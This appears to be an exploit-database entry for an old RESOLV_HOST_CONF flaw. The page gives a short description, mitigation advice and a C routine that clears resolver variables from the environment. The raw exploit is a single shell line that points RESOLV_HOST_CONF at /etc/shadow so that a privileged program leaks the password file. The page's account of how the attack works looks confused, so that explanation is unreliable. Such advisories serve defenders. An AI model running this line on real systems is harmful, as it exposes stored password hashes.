vendor:
by: Unknown
CVSS: 7.5 HIGH
Command Injection
CWE: 78
Product Name:
Affected Version From: Not specified
Affected Version To: Not specified
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Not specified
1996

RESOLV_HOST_CONF Command Injection

The RESOLV_HOST_CONF environment variable is vulnerable to command injection. An attacker can set the variable to a malicious command, which will be executed when the system tries to resolve a hostname. In this example, the attacker sets the variable to /etc/shadow; ping adfas, causing the system to ping the host adfas after reading the /etc/shadow file.

Mitigation:

To mitigate this vulnerability, ensure that the RESOLV_HOST_CONF environment variable is properly sanitized and does not allow for command injection. Additionally, it is recommended to restrict access to sensitive files such as /etc/shadow.
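One way a privileged program can apply the sanitization described above is to drop RESOLV_HOST_CONF from its inherited environment before any hostname lookup. This is an added example, not code from the original entry; the function names are hypothetical, and the three extra variables in the deny-list are other glibc resolver variables included as an assumption.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200112L   /* for setenv()/unsetenv() */
#endif
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* RESOLV_HOST_CONF is the variable named on this page. The other entries are
 * further resolver variables, listed here as an assumption about what a
 * privileged program should not inherit from its caller. */
static const char *const RESOLVER_ENV_DENYLIST[] = {
    "RESOLV_HOST_CONF", "HOSTALIASES", "LOCALDOMAIN", "RES_OPTIONS",
};

/* True when real and effective IDs differ (set-uid or set-gid context). */
int running_with_elevated_ids(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Remove every deny-listed variable, including duplicate entries.
 * Returns the number of names removed, or -1 if unsetenv() fails so the
 * caller can refuse to continue with an unsanitized environment. */
int scrub_resolver_env(void)
{
    int removed = 0;
    size_t n = sizeof RESOLVER_ENV_DENYLIST / sizeof RESOLVER_ENV_DENYLIST[0];
    for (size_t i = 0; i < n; i++) {
        const char *name = RESOLVER_ENV_DENYLIST[i];
        if (getenv(name) == NULL)
            continue;
        while (getenv(name) != NULL)
            if (unsetenv(name) != 0)
                return -1;
        removed++;
    }
    return removed;
}

int main(void)
{
    setenv("RESOLV_HOST_CONF", "/etc/shadow", 1);  /* constructed input */
    int removed = scrub_resolver_env();
    if (removed < 0)
        return 1;                                  /* fail closed */
    printf("elevated=%d removed=%d RESOLV_HOST_CONF=%s\n",
           running_with_elevated_ids(), removed,
           getenv("RESOLV_HOST_CONF") ? "still set" : "unset");
    return 0;
}
```

Call scrub_resolver_env() at the very start of the program, before any library call that may resolve a hostname.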

Exploit-DB raw data:

setenv RESOLV_HOST_CONF /etc/shadow; ping adfas

# milw0rm.com [1996-01-01]